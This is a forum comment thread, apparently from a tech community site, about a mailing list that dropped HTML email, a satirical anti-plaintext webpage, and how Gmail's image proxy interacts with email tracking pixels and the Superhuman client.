                                                                                                                                                                                                You raise a good point, however I take one small issue with this: This particular “feature” was never raised by the person who offered the hosting until after the transition had taken place. I can’t immediately think of a real-world analogy, but I imagine you don’t need one.

                                                                                                                                                                                                To offer to host the mailing list then lock out a portion of the user base until they fit your world view is, in my (in the big picture, unqualified and irrelevant) opinion, in pretty bad taste. This should have been raised as a condition prior to the implementation.

                                                                                                                                                                                                As to who is at fault for this, I wouldn’t be able to say. I don’t know if it’s unreasonable to assume that a mailing list software would not drop emails given undisclosed criteria.

                                                                                                                                                                                                my point is that the reaction here …

                                                                                                                                                                                                Agreed, although based on context of the document one could infer that it was aimed at the practice of locking users out itself, given the first line being “Elitism-Free Working Group”. Thinking otherwise is uncomfortable in my opinion.

                                                                                                                                                                                                there are “forks” of slackware for example …

                                                                                                                                                                                                Very good point. Thank you.

                                                                                                                                                                                                1. 1

                                                                                                                                                                                                  You raise a good point […]

                                                                                                                                                                                                  i think that it just hasn’t occured to them that this would be a problem. i’d always assume plaintext on mailinglists, especially on lists of distributions etc. the lock-out was an unfortunate side effect of this. that the list shouldn’t just drop the mails but bounce them is a valid point though. “things just went wrong”, probably because of bad communication not bad intents.

                                                                                                                                                                                                  Agreed, although based on context […]

                                                                                                                                                                                                  i didn’t like this document because of linguistic tactics, it’s more-or-less authored anonymously, and full of ad hominem arguments. it’s bad taste and counterproductive.

                                                                                                                                                                                                2. 1

                                                                                                                                                                                                  my point is that the reaction here (calling for beheading) isn’t a way to fix issues, it’s just flaming because something isn’t the way one wants it to.

                                                                                                                                                                                                  Well beheadings rarely fix anything, but we can’t be sure until we try. What if the head grows back? I thought that website to be pretty funny anyway, but I guess YMMV. Maybe a satire tag would’ve helped. :)

                                                                                                                                                                                                  i know that it is hard today for many people if their points of view aren’t accepted as the only right one, but then it may be time for a fork instead of destructive behavior.

                                                                                                                                                                                                  If someone makes a website about how colonialism is cool, is it destructive to make the opposite website, or just discussion?

                                                                                                                                                                                            2. 2

                                                                                                                                                                                              I wasn’t aware of that (I also wouldn’t be affected by it, being a TUI email user). That does seem like a harsh sudden requirement for continued participation/contribution in the project.

                                                                                                                                                                                          1. 4

                                                                                                                                                                                            I read the archived version, and it is so hilariously wrong. Quotes pulled out of nowhere, quoting yourself without any source and putting it like it’s not you saying it, and lines like this: “This phenomenon has been named “not being a contrarian” by the scientific community.”

                                                                                                                                                                                            1. 2

                                                                                                                                                                                              I’d mitigate this with considering this as a gut reaction. That provoke a gut-gut-reaction in return on everyone.

                                                                                                                                                                                            1. 6

                                                                                                                                                                                              I presume this is partly triggered in reply to all the noise about the SuperHuman client….

                                                                                                                                                                                              Interesting point here…

                                                                                                                                                                                              1. Privacy invasion and tracking

                                                                                                                                                                                              The accusation levelled against HTML emails is that marketers use HTML e-mails which provide things like a tracking pixel or other minutia in order to discern as to whether or not you have opened and read the e-mail. E-mail providers such as Google will automatically cache all remote content and serve it from its own server to prevent your IP address being leaked to the owner of the server to which the tracking pixel points. This also masks the time at which you open the email. Additionally, bad actors are also known use knives. An adequate justification for using scissors or an egg-wash brush to cut bread has yet to be seen.

                                                                                                                                                                                              Apparently Superhuman is an invitation-only Gmail front-end so something doesn’t match up….

                                                                                                                                                                                              I took a poke at some image rich email in my mail box…. and yes indeed, the images come from https://ci3.googleusercontent.com/proxy/

                                                                                                                                                                                              Very interestingly I can wget the images successfully. ie. WITHOUT my gmail credentials.

                                                                                                                                                                                              Have they encoded my credentials in the URL?

                                                                                                                                                                                              The cache control header is Cache-Control: max-age=300 so which is pretty short.

                                                                                                                                                                                              So is superhuman have some deal with gmail? Or is it using a public api on gmail?

                                                                                                                                                                                              A bit more experimentation reveals if you insert a picture from a web address, it assumes the pic is public anyway and doesn’t require credentials.

                                                                                                                                                                                              If you upload a pic, the url is so long wget barfs, (but curl seems to work) and replies “403 Forbidden”

                                                                                                                                                                                              1. 6

                                                                                                                                                                                                u wot m8

                                                                                                                                                                                                This seems to be a response to use plaintext email

                                                                                                                                                                                                1. 4

                                                                                                                                                                                                  Ok. Didn’t see that thread go by…. and if you wade all the way down to the references it references that so you’re right.

                                                                                                                                                                                                  Still SuperHuman seems to have defeated the proxying somehow (unless it doesn’t work it’s magic on gmail)

                                                                                                                                                                                                  1. 3

                                                                                                                                                                                                    Gmail proxies the requests only when asked, so Superhuman still knows when the email was opened, but not the IP address of the person who opened it.

                                                                                                                                                                                                    1. 2

                                                                                                                                                                                                      Aha! I think I have spotted a difference….

                                                                                                                                                                                                      If the sender base64 encodes the email, gmail doesn’t proxy image urls!

                                                                                                                                                                                                      (I noted this analysing an excellent phishing mail)

                                                                                                                                                                                                      1. 1

                                                                                                                                                                                                        https://mikeindustries.com/blog/archive/2019/06/superhuman-is-spying-on-you

                                                                                                                                                                                                        If I send you an email using Superhuman (no matter what email client you use), and you open it 9 times, this is what I see:

                                                                                                                                                                                                        Ok, I think the original blogger overstated the capabilties wrt gmail and retracted that in a later post. With gmail it can see when opened, not location.

                                                                                                                                                                                                        However it seems clear that for a number of other email clients out there you can see both, and even when you revisit.